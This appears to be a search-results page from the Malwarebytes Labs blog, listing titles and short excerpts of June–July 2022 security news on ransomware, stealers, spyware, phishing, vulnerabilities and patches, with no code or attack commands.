4662 matches found
A week in security (June 27 – July 3)
Last week on Malwarebytes Labs: Ransomware review: June 2022 AstraLocker 2.0 ransomware isn’t going to give you your files back YTStealer targets YouTube content creators ZuoRAT is a sophisticated malware that mainly targets SOHO routers Amazon Photos vulnerability could have given attackers acce...
Ransomware review: June 2022
Malwarebytes Threat Intelligence builds a monthly picture of ransomware activity by monitoring the information published by ransomware gangs on their Dark Web leak sites. This information represents victims who were successfully attacked but opted not to pay a ransom. In June, LockBit was the mos...
AstraLocker 2.0 ransomware isn’t going to give you your files back
Reversing Labs reports that the latest verison of AstraLocker ransomware is engaged in a a so-called "smash and grab" ransomware operation. Smash and grab is all about maxing out profit in the fastest time. It works on the assumption by malware authors that security software or victims will find...
YTStealer targets YouTube content creators
Researchers are reporting the discovery of malware targeting YouTub content creators. The aim is to compromise accounts and then take over the victims channels completely. The malware, dubbed YTStealer, has one game plan: Grabbing authentication cookies. A site gives you an authentication cookie...
ZuoRAT is a sophisticated malware that mainly targets SOHO routers
Researchers have analysed a campaign leveraging infected SOHO routers to target predominantly North American and European networks of interest. The so-called ZuoRAT campaign, which very likely started in 2020, is so sophisticated that the researchers suspect that there is a state sponsored threat...
Amazon Photos vulnerability could have given attackers access to user files and data
Amazon has patched a flaw in the Amazon Photos app which could have allowed an attacker to steal and use a users unique access token that verifies their identity across multiple Amazon APIs. That would give attackers access to a trove of information, since many of these APIs contain personal data...
Criminals are applying for remote work using deepfake and stolen identities, says FBI
The FBI has warned businesses of an uptick in reports of criminals applying for remote work using deepfake and stolen PII personally identifiable information. A deepfake is essentially created or modified media image, video, or audio, often with the help of artificial intelligence AI and machine...
Immigration organisations targeted by APT group Evilnum
Organisations working in the immigration sector are advised to be on high alert for Advanced Persistent Threat APT attacks. Bleeping Computer reports that European organisations, specifically, are under threat from the Evilnum hacking group. Evilnum, on the APT scene since 2018 at the earliest an...
Update now! Mozilla fixes security vulnerabilities and introduces a new privacy feature for Firefox
Mozilla released version 102.0 of the Firefox browser to Release channel users on June 28, 2022. The new version fixes 20 security vulnerabilities, five of which are classified as “High”. The new version also comes with a new privacy feature that strips parameters from URLs that track you around...
Raccoon Stealer returns with a new bag of tricks
The popular malware Raccoon stealer, which suspended operations after a developer allegedly died in the Ukraine invasion, has returned. Raccoon stealer is malware as a service, with the developers selling it to would-be users. The operation is a tightly-run ship, to the extent that customers have...
RansomHouse claims to have stolen at least 450GB of AMD’s data
AMD is investigating the claim that the RansomHouse extortion group has its hands on more than 450GB of the companys data. AMDs breach revelation came to light after RansomHouse teased on Telegram about selling data belonging to a popular three-letter company that starts with the letter A. The...
Forced Chrome extensions get removed, keep reappearing
In the continued saga of annoying search extensions we have a new end-of-level boss. Victims have been reporting browser extensions that were removed by Malwarebytes, but “magically” came back later. Since the victims also complained about the message saying their browser was "managed", we had a...
Internet Safety Month: Everything you need to know about Omegle
Omegle reached the heady heights of fame when everyone least expected it. Thanks to TikTok influencers, children flocked to this 13-year-old platform during the pandemic, unaware of the dangers already there. The concept of talking to strangers online is Omegles main selling point, but its not ne...
Hermit spyware is deployed with the help of a victim’s ISP
Googles Threat Analysis Group TAG has revealed a sophisticated spyware activity involving ISPs internet service providers aiding in downloading powerful commercial spyware onto users mobile devices. The spyware, dubbed Hermit, is reported to have government clients much like Pegasus. Italian vend...
City worker loses USB stick containing data on every resident after day of drinking
A person working in the city of Amagasaki, in Western Japan, has mislaid a USB stick which contained data on the citys 460,000 residents. The USB drive was in a bag that went missing during a reported day of drinking and dining at a restaurant last Tuesday. The person reported it to the police th...
LGBTQ+ community targeted by extortionists who threaten to publish nudes
The FTC Federal Trade Commission has warned the LGBTQ+ community about extortionists posing as potential romantic partners on Grindr and Feeld. The scammers send their targets explicit photos and then ask for them to reciprocate. If they do, targets are then blackmailed into paying a ransom,...
You only have nine months to ditch Exchange Server 2013
Microsoft has posted a reminder that Exchange Server 2013 reaches End of Support EoS on April 11, 2023. Thats a little more than 9 months from now. A useful and timely reminder, since we all realize that it takes some time to migrate to a different system. Every Windows product has a lifecycle. T...
Brave Search wants to replace Google’s biased search results with yours
Brave Search, Brave Softwares privacy search engine, just turned one. To celebrate, the company says it is moving the search engine out of its beta phase to become the default search engine for all Brave browser users. Goodbye, Google? Not entirely. In May 2015, Mozilla alumni Brendan Eich and...
CISA Log4Shell warning: Patch VMware Horizon installations immediately
CISA and the United States Coast Guard Cyber Command CGCYBER are warning that the threat of Log4Shell hasnt gone away. Its being actively exploited and used to target organisations using VMware Horizon and Unified Access Gateway servers. Log4Shell: what is it? Log4Shell was a zero-day vulnerabili...
Instagram introduces new ways for users to verify their age
If Instagram suspects you are fibbing about your age, youll currently see the following message: “You must be at least 13 years old to have an Instagram account. We disabled your account because you are not old enough yet. If you believe we made a mistake, please verify your age by submitting a...
A week in security (June 20 – June 26)
Last week on Malwarebytes Labs: LinkedIn scams are a "significant threat", warns FBI DDoS-for-hire service provider jailed Internet Safety Month: 7 tips for staying safe online while on vacation Client-side Magecart attacks still around, but more covert Security vulnerabilities: 5 times that...
5 ways to avoid being catfished
Today, many Americans will head out to the water—not to swim, but to catch a catfish in time for National Catfish Day. But when we talk about catfishing in cybersecurity, we mean something different. Here, catfishing refers to someone who assumes someone elses identity online in order to harass,...
Cybersecurity agencies: You don’t have to delete PowerShell to secure it
Microsofts PowerShell is a useful, flexible tool that is as popular with criminals as it is with admins. Cybercrooks like it becasue PowerShell is powerful, available almost everywhere, and doesnt look out of place running on a company network. In most places it isnt practical to block PowerShell...
Conti ransomware group’s pulse stops, but did it fake its own death?
The dark web leak site used by the notorious Conti ransomware gang has disappeared, along with the chat function it used to negotiate ransoms with victims. For as long as this infrastructure is down the group is unable to operate and a significent threat is removed from the pantheon of ransomware...
Dial 311 for… cybersecurity emergencies?
Members of the Cybersecurity Advisory Committee of CISA Cybersecurity and Infrastructure Security Agency have proposed an emergency cybersecurity call line for small and medium-sized businesses SMBs. Should the proposition be approved, SMBs would be able to call 311 in the event of a cybersecurit...
Rogue cryptocurrency billboards go phishing for wallets
Billboards and digital real world advertising has raised many questions of privacy and anonymity in recent years. Until now, the primary concern has been mostly legal, yet potentially objectionable geolocation and user profiling. Bluetooth beacons work in tandem with geofenced billboards to send...
Police seize and dismantle massive phishing operation
Europol has coordinated a joint operation to arrest members of a cybercrime gang and effectively dismantle their campaigns that netted million in Euros. This operation also led the Belgian Police Police Fédérale/Federale Politie and the Dutch Police Politie to nine arrests, 24 house searches, and...
MEGA claims it can’t decrypt your files. But someone’s managed to…
MEGA, the cloud storage provider and file hosting service, is very proud of its end-to-end encryption. It says it couldnt decrypt your stored files, even if it wanted to. “All your data on MEGA is encrypted with a key derived from your password; in other words, your password is your main encrypti...
7-Zip gets Mark of the Web feature, increases protection for users
One of the most popular zip programs around, 7-Zip, now offers support for "Mark of the Web" MOTW, which gives users better protection from malicious files. This is good news. But what does that actually mean? In the bad old days, opening up a downloaded document could be a fraught exercise...
Watch out for the email that says “You have a new voicemail!”
A phishing campaign is using voicemail notification messages to go after victims Office 365 credentials. According to researchers at ZScaler, the campaign uses spoofed emails with an HTML attachment that contains encoded javascript. The email claims that you have a new voicemail and that you can...
DFSCoerce, a new NTLM relay attack, can take control over a Windows domain
A researcher has published a Proof-of-Concept PoC for an NTLM relay attack dubbed DFSCoerce. The method leverages the Distributed File System: Namespace Management Protocol MS-DFSNM to seize control of a Windows domain. Active Directory A directory service is a hierarchical arrangement of objects...
Russia’s APT28 uses fear of nuclear war to spread Follina docs in Ukraine
This blog post was authored by Hossein Jazi and Roberto Santos. In a recent campaign, APT28, an advanced persistent threat actor linked with Russian intelligence, set its sights on Ukraine, targeting users with malware that steals credentials stored in browsers. APT28 also known as Sofacy and Fan...
You can be tracked online using your Chrome browser extensions
A researcher has found a way to generate a fingerprint of your device from your installed Google Chrome extensions, and then use that fingerprint to track you online. Fingerprinting is a way of figuring out what makes your device unique and then using that to identify you as you move around the...
Security vulnerabilities: 5 times that organizations got hacked
Businesses and governments these days are relying on dozens of different Software-as-a-Service SaaS applications to run their operations — and it’s no secret that hackers are always looking for security vulnerabilities in them to exploit. According to research by BetterCloud, the average company...
Client-side Magecart attacks still around, but more covert
This blog post was authored by Jérôme Segura We have seen and heard less buzz about Magecart during the past several months. While some marketing playbooks continue to rehash the same breaches of yesteryear, we have been wondering if some changes took place in the threat landscape. One thing we...
Internet Safety Month: 7 tips for staying safe online while on vacation
Going on vacation has never been more talked about and anticipated. I mean—for many of us, its been a while. But before you get lost in dreamy thoughts of sun, sea, and sand, you might want to set aside some time to plan on how to keep your devices, and your data, safe while you are relaxing Your...
DDoS-for-hire service provider jailed
Matthew Gatrel, a 33-year-old man from St. Charles, Illinois, has been sentenced to two years in prison for running websites that provide powerful distributed denial-of-service DDoS attacks against internet users and websites. This sentencing resulted in the seizure of his websites, making the...
LinkedIn scams are a “significant threat”, warns FBI
Digital currency fraud is a growing issue on social media, and LinkedIn is no different. In fact, according to according to Sean Ragan, the FBI’s special agent in charge of the San Francisco and Sacramento, California, field offices, cryptocurrency scams are big business on LinkedIn. "It’s a...
A week in security (June 13 – June 19)
Last week on Malwarebytes Labs: Serious vulnerabilities found in ITarian software, patches available for SaaS products Update Chrome now: Four high risk vulnerabilities found Taking down the IP2Scam tech support campaign Don’t panic! “Unpatchable” Mac vulnerability discovered Introducing...
Securing the software supply chain, with Kim Lewandowski: Lock and Code S03E13
At the start of the global coronavirus pandemic, nearly everyone was forced to learn about the "supply chain." Immediate stockpiling by an alarmed and from a smaller share, opportunistic public led to an almost overnight disappearance of hand sanitizer, bottled water, toilet paper, and face masks...
ALPHV squeezes victim with dedicated leak site for employees and customers
Eyebrows were raised this week when the ALPHV ransomware group created a leak site dedicated to just one of its victims. The site was aimed at the employees and guests of a hotelier that had been attacked, and allowed them to see if their personal details had been leaked. The new tactic seems to ...
Hertzbleed exposes computers’ secret whispers
Hertzbleed is the name for a vulnerability that can be used to obtain cryptographic keys and other secret data from Intel and AMD CPUs, remotely. It works by monitoring changes in power consumption, which can be deduced by the careful timing of known workloads, thanks to a processor power saving...
Interpol’s First Light operation smashes crime on a global scale
A large-scale Interpol operation has resulted in arrested and ill-gotten gains seizures galore. Operation First Light took place between March and May of this year. It involved 76 countries taking social engineers and telecommunications fraudsters to task, with multiple wins for those involved...
Photos of kids taken from spyware-ridden phones found exposed on the internet
A stalkerware-type app that boasts "the best free phone spying software on the market," has exposed the data it snooped on from the phones it was installed in. The data exposed by TheTruthSpy included GPS locations and photos on victims phones, and images of children and babies. This news, first...
Stealthy Symbiote Linux malware is after financial institutions
Symbiote, a new "nearly impossible to detect" Linux malware, targeted financial sectors in Latin America—and the threat actors behind it might have links to Brazil. These findings were revealed in a recent report, a joint effort between the Blackberry Research Team and Dr. Joakim Kennedy, a...
Record breaking HTTPS DDoS attack
Last week, Cloudflare blocked the largest HTTPS DDoS attack on record. The attack amassed some 26 million requests per second rps. The previous record for a HTTPS DDoS attack was 15.3 million rps. The attack targeted an unnamed Cloudflare customer and originated mostly from Cloud Service Provider...
Firefox stops advertisers tracking you as you browse, calls itself the most “private and secure major browser”
Cookies are in the news as Mozilla rolls out significant privacy changes for Firefox. The idea is to dramatically lessen the risk of privacy-invading tracking across websites without your knowledge. Tracking cookies have been a hot topic in recent months, as advertisers try switching to other...
Update now! Microsoft patches Follina, and many other security updates
The June 2022 Patch Tuesday may go down in history as the day that Follina got patched, but there was a host of other important updates. And not just from Microsoft. Many other software vendors follow the pattern of monthly updates set by the people in Redmond. Microsoft Microsoft released update...
It’s official, today you can say goodbye to Internet Explorer. Or can you?
Today, the Internet Explorer IE 11 desktop application goes out of support and will be retired for certain versions of Windows 10. The retirement consists of two phases. During the first phase—the redirection phase—devices will be progressively redirected from IE to Microsoft Edge over the...
Email compromise leads to healthcare data breach at Kaiser Permanente
At least 69,000 people have been impacted by a data breach at Kaiser Permanente, a long-running managed healthcare consortium. The latest in a long-running series of healthcare attacks, the road to stolen data began on April 5 this year with an email compromise. The direct path to data A...